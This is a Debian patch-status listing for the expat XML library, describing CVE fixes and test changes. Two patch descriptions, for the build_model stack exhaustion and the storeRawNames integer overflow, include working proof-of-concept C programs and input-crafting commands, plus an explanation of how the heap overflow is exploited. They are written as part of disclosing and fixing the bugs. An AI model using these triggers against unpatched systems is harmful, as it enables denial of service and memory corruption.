Debian Patches

Status for expat/2.2.10-2+deb11u6

Patch Description Author Forwarded Bugs Origin Last update
lib-Detect-and-prevent-troublesome-left-shifts-in-fu.patch lib: Detect and prevent troublesome left shifts in function storeAtts (CVE-2021-45960) Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/0adcb34c49bee5b19bd29b16a578c510c23597ea 2021-12-27
lib-Prevent-integer-overflow-on-m_groupSize-in-funct.patch lib: Prevent integer overflow on m_groupSize in function doProlog (CVE-2021-46143) Sebastian Pipping <sebastian@pipping.org> yes upstream https://github.com/libexpat/libexpat/commit/85ae9a2d7d0e9358f356b33977b842df8ebaec2b 2021-12-25
lib-Prevent-integer-overflow-at-multiple-places-CVE-.patch lib: Prevent integer overflow at multiple places (CVE-2022-22822 to CVE-2022-22827)

The involved functions are:
- addBinding (CVE-2022-22822)
- build_model (CVE-2022-22823)
- defineAttribute (CVE-2022-22824)
- lookup (CVE-2022-22825)
- nextScaffoldPart (CVE-2022-22826)
- storeAtts (CVE-2022-22827)
Sebastian Pipping <sebastian@pipping.org> no debian https://github.com/libexpat/libexpat/commit/9f93e8036e842329863bf20395b8fb8f73834d9e 2021-12-30
lib-Detect-and-prevent-integer-overflow-in-XML_GetBu.patch lib: Detect and prevent integer overflow in XML_GetBuffer (CVE-2022-23852) Samanta Navarro <ferivoz@riseup.net> no https://github.com/libexpat/libexpat/commit/847a645152f5ebc10ac63b74b604d0c1a79fae40 2022-01-22
tests-Cover-integer-overflow-in-XML_GetBuffer-CVE-20.patch tests: Cover integer overflow in XML_GetBuffer (CVE-2022-23852) Sebastian Pipping <sebastian@pipping.org> no https://github.com/libexpat/libexpat/commit/acf956f14bf79a5e6383a969aaffec98bfbc2e44 2022-01-23
lib-Prevent-integer-overflow-in-doProlog-CVE-2022-23.patch lib: Prevent integer overflow in doProlog (CVE-2022-23990)
The change from "int nameLen" to "size_t nameLen"
addresses the overflow on "nameLen++" in code
"for (; name[nameLen++];)" right above the second
change in the patch.
Sebastian Pipping <sebastian@pipping.org> no https://github.com/libexpat/libexpat/commit/ede41d1e186ed2aba88a06e84cac839b770af3a1 2022-01-26
Prevent-stack-exhaustion-in-build_model.patch Prevent stack exhaustion in build_model
It is possible to trigger stack exhaustion in build_model function if
depth of nested children in DTD element is large enough. This happens
because build_node is a recursively called function within build_model.

The code has been adjusted to run iteratively. It uses the already
allocated heap space as temporary stack (growing from top to bottom).

Output is identical to recursive version. No new fields in data
structures were added, i.e. it keeps full API and ABI compatibility.
Instead the numchildren variable is used to temporarily keep the
index of items (uint vs int).

Documentation and readability improvements kindly added by Sebastian.

Proof of Concept:

1. Compile poc binary which parses XML file line by line

```
cat > poc.c << EOF
#include <err.h>
#include <expat.h>
#include <stdio.h>

XML_Parser parser;

static void XMLCALL
dummy_element_decl_handler(void *userData, const XML_Char *name,
XML_Content *model) {
XML_FreeContentModel(parser, model);
}

int main(int argc, char *argv[]) {
FILE *fp;
char *p = NULL;
size_t s = 0;
ssize_t l;
if (argc != 2)
errx(1, "usage: poc poc.xml");
if ((parser = XML_ParserCreate(NULL)) == NULL)
errx(1, "XML_ParserCreate");
XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
if ((fp = fopen(argv[1], "r")) == NULL)
err(1, "fopen");
while ((l = getline(&p, &s, fp)) > 0)
if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
errx(1, "XML_Parse");
XML_ParserFree(parser);
free(p);
fclose(fp);
return 0;
}
EOF
cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c
```

2. Create XML file with a lot of nested groups in DTD element

```
cat > poc.xml.zst.b64 << EOF
KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
EOF
base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
```

3. Run Proof of Concept

```
./poc poc.xml
```
Samanta Navarro <ferivoz@riseup.net> yes upstream https://github.com/libexpat/libexpat/commit/9b4ce651b26557f16103c3a366c91934ecd439ab 2022-02-15
Prevent-integer-overflow-in-storeRawNames.patch Prevent integer overflow in storeRawNames
It is possible to use an integer overflow in storeRawNames for out of
boundary heap writes. Default configuration is affected. If compiled
with XML_UNICODE then the attack does not work. Compiling with
-fsanitize=address confirms the following proof of concept.

The problem can be exploited by abusing the m_buffer expansion logic.
Even though the initial size of m_buffer is a power of two, eventually
it can end up a little bit lower, thus allowing allocations very close
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
names can be parsed which are almost INT_MAX in size.

Unfortunately (from an attacker point of view) INT_MAX/2 is also a
limitation in string pools. Having a tag name of INT_MAX/2 characters
or more is not possible.

Expat can convert between different encodings. UTF-16 documents which
contain only ASCII representable characters are twice as large as their
ASCII encoded counter-parts.

The proof of concept works by taking these three considerations into
account:

1. Move the m_buffer size slightly below a power of two by having a
short root node <a>. This allows the m_buffer to grow very close
to INT_MAX.
2. The string pooling forbids tag names longer than or equal to
INT_MAX/2, so keep the attack tag name smaller than that.
3. To be able to still overflow INT_MAX even though the name is
limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
which only contains ASCII characters. UTF-16 always stores two
bytes per character while the tag name is converted to using only
one. Our attack node byte count must be a bit higher than
2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
in sum can overflow INT_MAX.

Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
without running into INT_MAX boundary check. The string pooling is
able to store INT_MAX/3 as tag name because the amount is below
INT_MAX/2 limitation. And creating the sum of both eventually overflows
in storeRawNames.

Proof of Concept:

1. Compile expat with -fsanitize=address.

2. Create Proof of Concept binary which iterates through input
file 16 MB at once for better performance and easier integer
calculations:

```
cat > poc.c << EOF
#include <err.h>
#include <expat.h>
#include <stdlib.h>
#include <stdio.h>

#define CHUNK (16 * 1024 * 1024)
int main(int argc, char *argv[]) {
XML_Parser parser;
FILE *fp;
char *buf;
int i;

if (argc != 2)
errx(1, "usage: poc file.xml");
if ((parser = XML_ParserCreate(NULL)) == NULL)
errx(1, "failed to create expat parser");
if ((fp = fopen(argv[1], "r")) == NULL) {
XML_ParserFree(parser);
err(1, "failed to open file");
}
if ((buf = malloc(CHUNK)) == NULL) {
fclose(fp);
XML_ParserFree(parser);
err(1, "failed to allocate buffer");
}
i = 0;
while (fread(buf, CHUNK, 1, fp) == 1) {
printf("iteration %d: XML_Parse returns %d\n", ++i,
XML_Parse(parser, buf, CHUNK, XML_FALSE));
}
free(buf);
fclose(fp);
XML_ParserFree(parser);
return 0;
}
EOF
gcc -fsanitize=address -lexpat -o poc poc.c
```

3. Construct specially prepared UTF-16 XML file:

```
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
```

4. Run proof of concept:

```
./poc poc-utf16.xml
```
Samanta Navarro <ferivoz@riseup.net> yes upstream https://github.com/libexpat/libexpat/commit/eb0362808b4f9f1e2345a0cf203b8cc196d776d9 2022-02-15
Prevent-integer-overflow-in-copyString.patch Prevent integer overflow in copyString
The copyString function is only used for encoding string supplied by
the library user.
Samanta Navarro <ferivoz@riseup.net> yes upstream https://github.com/libexpat/libexpat/commit/efcb347440ade24b9f1054671e6bd05e60b4cafd 2022-02-15
lib-Fix-harmless-use-of-uninitialized-memory.patch lib: Fix (harmless) use of uninitialized memory Sebastian Pipping <sebastian@pipping.org> yes upstream https://github.com/libexpat/libexpat/commit/6881a4fc8596307ab9ff2e85e605afa2e413ab71 2022-02-12
lib-Protect-against-malicious-namespace-declarations.patch lib: Protect against malicious namespace declarations (CVE-2022-25236) Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/a2fe525e660badd64b6c557c2b1ec26ddc07f6e4 2022-02-12
tests-Cover-CVE-2022-25236.patch tests: Cover CVE-2022-25236 Sebastian Pipping <sebastian@pipping.org> yes upstream https://github.com/libexpat/libexpat/commit/2de077423fb22750ebea599677d523b53cb93b1d 2022-02-12
lib-Drop-unused-macro-UTF8_GET_NAMING.patch lib: Drop unused macro UTF8_GET_NAMING Sebastian Pipping <sebastian@pipping.org> yes upstream https://github.com/libexpat/libexpat/commit/ee2a5b50e7d1940ba8745715b62ceb9efd3a96da 2022-02-08
lib-Add-missing-validation-of-encoding-CVE-2022-2523.patch lib: Add missing validation of encoding (CVE-2022-25235) Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6 2022-02-08
lib-Add-comments-to-BT_LEAD-cases-where-encoding-has.patch lib: Add comments to BT_LEAD* cases where encoding has already been validated Sebastian Pipping <sebastian@pipping.org> yes upstream https://github.com/libexpat/libexpat/commit/c85a3025e7a1be086dc34e7559fbc543914d047f 2022-02-09
tests-Cover-missing-validation-of-encoding-CVE-2022-.patch tests: Cover missing validation of encoding (CVE-2022-25235) Sebastian Pipping <sebastian@pipping.org> yes upstream https://github.com/libexpat/libexpat/commit/6a5510bc6b7efe743356296724e0b38300f05379 2022-02-08
Fix-build_model-regression.patch Fix build_model regression.
The iterative approach in build_model failed to fill children arrays
correctly. A preorder traversal is not required and turned out to be the
culprit. Use an easier algorithm:

Add nodes from scaffold tree starting at index 0 (root) to the target
array whenever children are encountered. This ensures that children
are adjacent to each other. This complies with the recursive version.

Store only the scaffold index in numchildren field to prevent a direct
processing of these children, which would require a recursive solution.
This allows the algorithm to iterate through the target array from start
to end without jumping back and forth, converting on the fly.
Samanta Navarro <ferivoz@riseup.net> yes upstream https://github.com/libexpat/libexpat/commit/b12f34fe32821a69dc12ff9a021daca0856de238 2022-02-19
tests-Protect-against-nested-element-declaration-mod.patch tests: Protect against nested element declaration model regressions Sebastian Pipping <sebastian@pipping.org> yes upstream https://github.com/libexpat/libexpat/commit/154e565f6ef329c9ec97e6534c411ddde0b320c8 2022-02-20
lib-Relax-fix-to-CVE-2022-25236-with-regard-to-RFC-3.patch lib: Relax fix to CVE-2022-25236 with regard to RFC 3986 URI characters Sebastian Pipping <sebastian@pipping.org> no https://github.com/libexpat/libexpat/commit/2ba6c76fca21397959145e18c5ef376201209020 2022-02-27
tests-Cover-relaxed-fix-to-CVE-2022-25236.patch tests: Cover relaxed fix to CVE-2022-25236 Sebastian Pipping <sebastian@pipping.org> no https://github.com/libexpat/libexpat/commit/e0f852db1e3b1e6d34922c68a653c3cc4b85361c 2022-03-03
lib-Document-namespace-separator-effect-right-in-hea.patch lib: Document namespace separator effect right in header <expat.h> Sebastian Pipping <sebastian@pipping.org> no https://github.com/libexpat/libexpat/commit/5dd52182972a35f2251a07784eda35d3d52d3e07 2022-03-01
lib-doc-Add-a-note-on-namespace-URI-validation.patch lib|doc: Add a note on namespace URI validation
[Salvatore Bonaccorso: Backport to 2.2.10 for context changes]
Sebastian Pipping <sebastian@pipping.org> no https://github.com/libexpat/libexpat/commit/c57bea96b73eee1c6d5e288f0f57efbf5238e49a 2022-03-01
CVE-2022-40674.patch [PATCH] Ensure raw tagnames are safe exiting internalEntityParser
It is possible to concoct a situation in which parsing is
suspended while substituting in an internal entity, so that
XML_ResumeParser directly uses internalEntityProcessor as
its processor. If the subsequent parse includes some unclosed
tags, this will return without calling storeRawNames to ensure
that the raw versions of the tag names are stored in memory other
than the parse buffer itself. If the parse buffer is then changed
or reallocated (for example if processing a file line by line),
badness will ensue.

This patch ensures storeRawNames is always called when needed
after calling doContent. The earlier call do doContent does
not need the same protection; it only deals with entity
substitution, which cannot leave unbalanced tags, and in any
case the raw names will be pointing into the stored entity
value not the parse buffer.
Rhodri James <rhodri@wildebeest.org.uk> no 2022-08-17
CVE-2022-40674_addon.patch [PATCH 1/2] tests: Cover heap use-after-free issue in doContent Sebastian Pipping <sebastian@pipping.org> no 2022-09-11
lib-Fix-overeager-DTD-destruction-in-XML_ExternalEnt.patch lib: Fix overeager DTD destruction in XML_ExternalEntityParserCreate Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/5290462a7ea1278a8d5c0d5b2860d4e244f997e4 2022-09-20
tests-Cover-overeager-DTD-destruction-in-XML_Externa.patch tests: Cover overeager DTD destruction in XML_ExternalEntityParserCreate Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/43992e4ae25fc3dc0eec0cd3a29313555d56aee2 2022-09-19
tests-Move-triplet_start_checker-flag-check-after-isFinal.patch tests: Move triplet_start_checker flag check after isFinal=1 call
There is no guarantee that the callback will happen before the parse
call with isFinal=XML_TRUE. Let's move the assertion to a location
where we know it must have happened.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/d52b4141496bd26bd716d88c67af8f2250bd0da6 2023-08-24
tests-Set-isFinal-in-test_column_number_after_parse.patch tests: Set isFinal in test_column_number_after_parse
Without this, parsing of the end tag may be deferred, yielding an
unexpected column number.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/2cee1061e2fec10633c3f02a961dabf95e85910a 2023-08-24
tests-Set-isFinal-1-in-line-column-number-after-error-tes.patch tests: Set isFinal=1 in line/column-number-after-error tests Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/d4105a9080271a8d4996d2454f89be9992cb268a 2023-08-31
Always-consume-BOM-bytes-when-found-in-prolog.patch Always consume BOM bytes when found in prolog
The byte order mark is not correctly consumed when followed by an
incomplete token in a non-final parse. This results in the BOM staying
in the buffer, causing an invalid token error later.

This was not detected by existing tests because they either parse
everything in one call, or add a single byte at a time.

By moving `s` forward when we find a BOM, we make sure that the BOM
bytes are properly consumed in all cases.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/182bbc350ed8b3c547133a9a44a4f30a0ba3b77e 2023-08-31
tests-Add-_fail-function-and-assert_true-macro.patch tests: Add _fail() function and assert_true() macro. Guilhem Moulin <guilhem@debian.org> no https://github.com/libexpat/libexpat/commit/cce19de59f849cbee55c8c62e77481593fac1468 2024-09-11
tests-Make-test_default_current-insensitive-to-callback-c.patch tests: Make test_default_current insensitive to callback chunking
Instead of testing the exact number and sequence of callbacks, we now
test that we get the exact data lengths and sequence of callbacks. The
checks become much more verbose, but will now accept any buffer fill
strategy -- single bytes, multiple bytes, or any combination thereof.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/182bbc350ed8b3c547133a9a44a4f30a0ba3b77e 2023-08-31
tests-Look-for-single-char-match-in-test_abort_epilog.patch tests: Look for single-char match in test_abort_epilog
...instead of a full-string match.

These tests were depending on getting handler callbacks with exactly
one character of data at a time. For example, if test_abort_epilog got
"\n\r\n" in one callback, it would fail to match on the '\r', and would
not abort parsing as expected.

By searching the callback arg for the magic character rather than
expecting a full match, the test no longer depends on exact callback
timing.

`userData` is never NULL in these tests, so that check was left out of
the new version.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/4978d285d205d1238c823876134c3e486a3c2fe5 2023-08-31
tests-Run-SINGLE_BYTES-with-variously-sized-chunks.patch tests: Run SINGLE_BYTES with variously-sized chunks
The _XML_Parse_SINGLE_BYTES function currently calls XML_Parse() one
byte at a time. This is useful to detect possible parsing bugs related
to having to exit parsing, wait for more data, and resume.

This commit makes SINGLE_BYTES even more useful by repeating all tests,
changing the chunk size every time. So instead of just one byte at a
time, we now also test two bytes at a time, and so on. Tests that don't
use the SINGLE_BYTES also run multiple times, but are otherwise not
affected.

This uncovered some issues, which have been fixed in preceding commits.

On failure, the chunk size is included in the "FAIL" log prints.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/d2b31760cd5d22b26316d407789caded826857e3 2023-08-25
tests-set-isFinal-in-test_line_number_after_parse.patch tests: set isFinal in test_line_number_after_parse
Without this, parsing of the start or end tag may be deferred, yielding
an unexpected line number.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/2e1253414559d2649cbf5662496800061034eb49 2023-09-26
tests-set-isFinal-in-test_reset_in_entity.patch tests: set isFinal in test_reset_in_entity
Without this, parsing may be deferred so that the suspending callback
hasn't been called when the test checks for it.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/bb3c17198072abe89885949b85f8a0f353ac41c9 2023-09-26
tests-Remove-early-comment-count-check-in-test_user_param.patch tests: Remove early comment count check in test_user_parameters
Before a parse call with isFinal=XML_TRUE, there is no guarantee that
all supplied data has been parsed. Removing the first comment count
check removes the test's assumption of such a guarantee.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/a5993b2d42d88e1a39124117a781a055dbb0598b 2023-09-26
tests-Exit-parser_stop_character_handler-if-parser-is-fin.patch tests: Exit parser_stop_character_handler if parser is finished
When test_repeated_stop_parser_between_char_data_calls runs without
chunking the input -- which I am about to do in my next commit -- the
parser_stop_character_handler callback happens multiple times. This is
because stopping the parser doesn't stop all callbacks immediately,
which is valid (documented) behavior.

The second callback tried to stop the parser again, getting unexpected
errors. Let's check the parser status on entry and return early if it's
already finished.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/b4d2b76a97ab88854a26f4166cb294a0622144cd 2023-09-26
tests-Replace-invalid-entity-expansion-in-test_alloc_nest.patch tests: Replace invalid entity expansion in test_alloc_nested_entities

%pe2; would ultimately expand to a plain "ABCDEF...", which is not
valid in this context. This was not normally hit, since the test would
get its expected XML_ERROR_NO_MEMORY before expanding this far.

With g_chunkSize=0 and EXPAT_CONTEXT_BYTES=OFF, the number of allocs
required to reach that point becomes *just* low enough to reach the
final expansion, making the test fail with a very unexpected syntax
error.

Nesting %pe2; in another entity declaration avoids the problem.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/7b0e27a6981014313a9f30486a0b4d2e0a3ebde3 2023-09-28
tests-Run-SINGLE_BYTES-with-no-chunking.patch tests: Run SINGLE_BYTES with no chunking
...in addition to 1-to-5-byte chunks as we've done so far.

By starting g_chunkSize at 0, we get to run all the tests that call
_XML_Parse_SINGLE_BYTES() as if they just called XML_Parse(). This
gives us extra test coverage.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/091ba48d7a5a8fcb65ba383d81d062c6e9046a88 2023-09-26
CVE-2023-52425/01-119ae27.patch Grow buffer based on current size
Until now, the buffer size to grow to has been calculated based on the
distance from the current parse position to the end of the buffer. This
means that the size of any already-parsed data was not considered,
leading to inconsistent buffer growth.

There was also a special case in XML_Parse() when XML_CONTEXT_BYTES was
zero, where the buffer size would be set to twice the incoming string
length. This patch replaces this with an XML_GetBuffer() call.

Growing the buffer based on its total size makes its growth consistent.

The commit includes a test that checks that we can reach the max buffer
size (usually INT_MAX/2 + 1) regardless of previously parsed content.

GitHub CI couldn't allocate the full 1GiB with MinGW/wine32, though it
works locally with the same compiler and wine version. As a workaround,
the test tries to malloc 1GiB, and reduces `maxbuf` to 512MiB in case
of failure.
Snild Dolkow <snild@sony.com> yes upstream https://github.com/libexpat/libexpat/commit/dcbc1436809b7cd4552ed4e929790739d08d0dca 2023-09-28
CVE-2023-52425/02-3484383.patch Add aaaaaa_*.xml with unreasonably large tokens
Some of these currently take a very long time to parse. I set those to
only run one loop in the run-benchmark make target.

4096 may be a fairly small buffer, and definitely make the problem worse
than it otherwise would've been, but similar sizes exist in real code:

* 2048 bytes in cpython Modules/pyexpat.c
* 4096 bytes in skia SkXMLParser.cpp
* BUFSIZ bytes (8192 on my machine) in expat/examples

The files, too, are inspired by real-life examples: Android stores
depth and gain maps as base64-encoded JPEGs inside the XMP data of
other JPEGs. Sometimes as a text element, sometimes as an attribute
value. I've seen attribute values slightly over 5 MiB in size.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/3484383fa75e0ea2aa716360088813c3b205b261 2023-08-17
CVE-2023-52425/03-9cdf9b8.patch Skip parsing after repeated partials on the same token
When the parse buffer contains the starting bytes of a token but not
all of them, we cannot parse the token to completion. We call this a
partial token. When this happens, the parse position is reset to the
start of the token, and the parse() call returns. The client is then
expected to provide more data and call parse() again.

In extreme cases, this means that the bytes of a token may be parsed
many times: once for every buffer refill required before the full token
is present in the buffer.

Math:
Assume there's a token of T bytes
Assume the client fills the buffer in chunks of X bytes
We'll try to parse X, 2X, 3X, 4X ... until mX == T (technically >=)
That's (m²+m)X/2 = (T²/X+T)/2 bytes parsed (arithmetic progression)
While it is alleviated by larger refills, this amounts to O(T²)

Expat grows its internal buffer by doubling it when necessary, but has
no way to inform the client about how much space is available. Instead,
we add a heuristic that skips parsing when we've repeatedly stopped on
an incomplete token. Specifically:

* Only try to parse if we have a certain amount of data buffered
* Every time we stop on an incomplete token, double the threshold
* As soon as any token completes, the threshold is reset

This means that when we get stuck on an incomplete token, the threshold
grows exponentially, effectively making the client perform larger buffer
fills, limiting how many times we can end up re-parsing the same bytes.

Math:
Assume there's a token of T bytes
Assume the client fills the buffer in chunks of X bytes
We'll try to parse X, 2X, 4X, 8X ... until (2^k)X == T (or larger)
That's (2^(k+1)-1)X bytes parsed -- e.g. 15X if T = 8X
This is equal to 2T-X, which amounts to O(T)

We could've chosen a faster growth rate, e.g. 4 or 8. Those seem to
increase performance further, at the cost of further increasing the
risk of growing the buffer more than necessary. This can easily be
adjusted in the future, if desired.

This is all completely transparent to the client, except for:
1. possible delay of some callbacks (when our heuristic overshoots)
2. apps that never do isFinal=XML_TRUE could miss data at the end

For the affected testdata, this change shows a 100-400x speedup.
The recset.xml benchmark shows no clear change either way.

Before:
benchmark -n ../testdata/largefiles/recset.xml 65535 3
3 loops, with buffer size 65535. Average time per loop: 0.270223
benchmark -n ../testdata/largefiles/aaaaaa_attr.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 15.033048
benchmark -n ../testdata/largefiles/aaaaaa_cdata.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 0.018027
benchmark -n ../testdata/largefiles/aaaaaa_comment.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 11.775362
benchmark -n ../testdata/largefiles/aaaaaa_tag.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 11.711414
benchmark -n ../testdata/largefiles/aaaaaa_text.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 0.019362

After:
./run.sh benchmark -n ../testdata/largefiles/recset.xml 65535 3
3 loops, with buffer size 65535. Average time per loop: 0.269030
./run.sh benchmark -n ../testdata/largefiles/aaaaaa_attr.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 0.044794
./run.sh benchmark -n ../testdata/largefiles/aaaaaa_cdata.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 0.016377
./run.sh benchmark -n ../testdata/largefiles/aaaaaa_comment.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 0.027022
./run.sh benchmark -n ../testdata/largefiles/aaaaaa_tag.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 0.099360
./run.sh benchmark -n ../testdata/largefiles/aaaaaa_text.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 0.017956
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/9cdf9b8d77d5c2c2a27d15fb68dd3f83cafb45a1 2023-08-17
CVE-2023-52425/04-1b9d398.patch Don't update partial token heuristic on error Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/1b9d398517befeb944cbbadadf10992b07e96fa2 2023-09-04
Autotools-Give-test-suite-access-to-internal-symbols.patch Autotools: Give test suite access to internal symbols Sebastian Pipping <sebastian@pipping.org> no https://github.com/libexpat/libexpat/commit/f01a61402cd44bb0cb59db43e70309c01acc50d1 2021-04-05
CVE-2023-52425/05-9fe3672.patch tests: Run both with and without partial token heuristic
If we always run with the heuristic enabled, it may hide some bugs by
grouping up input into bigger parse attempts.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/9fe3672459c1bf10926b85f013aa1b623d855545 2023-09-18
CVE-2023-52425/06-f1eea78.patch tests: Add max_slowdown info in test_big_tokens_take_linear_time Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/f1eea784d0429bc4813a3d66a8e24e6c9df56be7 2023-11-06
CVE-2023-52425/07-09957b8.patch Allow XML_GetBuffer() with len=0 on a fresh parser
len=0 was previously OK if there had previously been a non-zero call.
It makes sense to allow an application to work the same way on a
newly-created parser, and not have to care if its incoming buffer
happens to be 0.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/09957b8ced725b96a95acff150facda93f03afe1 2023-10-26
CVE-2023-52425/08-1d3162d.patch Add app setting for enabling/disabling reparse heuristic Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/1d3162da8a85a398ab451aadd6c2ad19587e5a68 2023-09-11
CVE-2023-52425/09-8ddd8e8.patch Try to parse even when incoming len is zero
If the reparse deferral setting has changed, it may be possible to
finish a token.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/8ddd8e86aa446d02eb8d398972d3b10d4cad908a 2023-09-29
CVE-2023-52425/10-ad9c01b.patch Make external entity parser inherit partial token heuristic setting
The test is essentially a copy of the existing test for the setter,
adapted to run on the external parser instead of the original one.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/ad9c01be8ee5d3d5cac2bfd3949ad764541d35e7 2023-10-26
CVE-2023-52425/11-60b7420.patch Bypass partial token heuristic when close to maximum buffer size
For huge tokens, we may end up in a situation where the partial token
parse deferral heuristic demands more bytes than Expat's maximum buffer
size (currently ~half of INT_MAX) could fit.

INT_MAX/2 is 1024 MiB on most systems. Clearly, a token of 950 MiB could
fit in that buffer, but the reparse threshold might be such that
callProcessor() will defer it, allowing the app to keep filling the
buffer until XML_GetBuffer() eventually returns a memory error.

By bypassing the heuristic when we're getting close to the maximum
buffer size, it will once again be possible to parse tokens in the size
range INT_MAX/2/ratio < size < INT_MAX/2 reliably.

We subtract the last buffer fill size as a way to detect that the next
XML_GetBuffer() call has a risk of returning a memory error -- assuming
that the application is likely to keep using the same (or smaller) fill.

We subtract XML_CONTEXT_BYTES because that's the maximum amount of bytes
that could remain at the start of the buffer, preceding the partial
token. Technically, it could be fewer bytes, but XML_CONTEXT_BYTES is
normally small relative to INT_MAX, and is much simpler to use.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/60b74209899a67d426d208662674b55a5eed918c 2023-10-04
CVE-2023-52425/12-3d8141d.patch Bypass partial token heuristic when nearing full buffer
...instead of only when approaching the maximum buffer size INT/2+1.

We'd like to give applications a chance to finish parsing a large token
before buffer reallocation, in case the reallocation fails.

By bypassing the reparse deferral heuristic when getting close to the
filling the buffer, we give them this chance -- if the whole token is
present in the buffer, it will be parsed at that time.

This may come at the cost of some extra reparse attempts. For a token
of n bytes, these extra parses cause us to scan over a maximum of
2n bytes (... + n/8 + n/4 + n/2 + n). Therefore, parsing of big tokens
remains O(n) in regard how many bytes we scan in attempts to parse. The
cost in reality is lower than that, since the reparses that happen due
to the bypass will affect m_partialTokenBytesBefore, delaying the next
ratio-based reparse. Furthermore, only the first token that "breaks
through" a buffer ceiling takes that extra reparse attempt; subsequent
large tokens will only bypass the heuristic if they manage to hit the
new buffer ceiling.

Note that this cost analysis depends on the assumption that Expat grows
its buffer by doubling it (or, more generally, grows it exponentially).
If this changes, the cost of this bypass may increase. Hopefully, this
would be caught by test_big_tokens_take_linear_time or the new test.

The bypass logic assumes that the application uses a consistent fill.
If the app increases its fill size, it may miss the bypass (and the
normal heuristic will apply). If the app decreases its fill size, the
bypass may be hit multiple times for the same buffer size. The very
worst case would be to always fill half of the remaining buffer space,
in which case parsing of a large n-byte token becomes O(n log n).

As an added bonus, the new test case should be faster than the old one,
since it doesn't have to go all the way to 1GiB to check the behavior.

Finally, this change necessitated a small modification to two existing
tests related to reparse deferral. These tests are testing the deferral
enabled setting, and assume that reparsing will not happen for any other
reason. By pre-growing the buffer, we make sure that this new deferral
does not affect those test cases.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/3d8141d26a3b01ff948e00956cb0723a89dadf7f 2023-11-20
CVE-2023-52425/13-8f8aaf5.patch tests: Check heuristic bypass with varying buffer fill sizes
The bypass works on the assumption that the application uses a
consistent fill size. Let's make some assertions about what should
happen when the application doesn't do that -- most importantly,
that parsing does happen eventually, and that the number of scanned
bytes doesn't explode.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/8f8aaf5c8e8a6e812dd8dadd96cf9bd044bc085a 2023-11-24
CVE-2023-52425/14-09fdf99.patch xmlwf: Support disabling reparse deferral Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/09fdf998e7cf3f8f9327e6602077791095aedd4d 2023-11-09
CVE-2023-52425/15-d5b02e9.patch xmlwf: Document argument "-q" Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/d5b02e96ab95d2a7ae0aea72d00054b9d036d76d 2023-11-09
CVE-2024-45490/01-5c1a316.patch lib: Reject negative len for XML_ParseBuffer
Reported by TaiYou
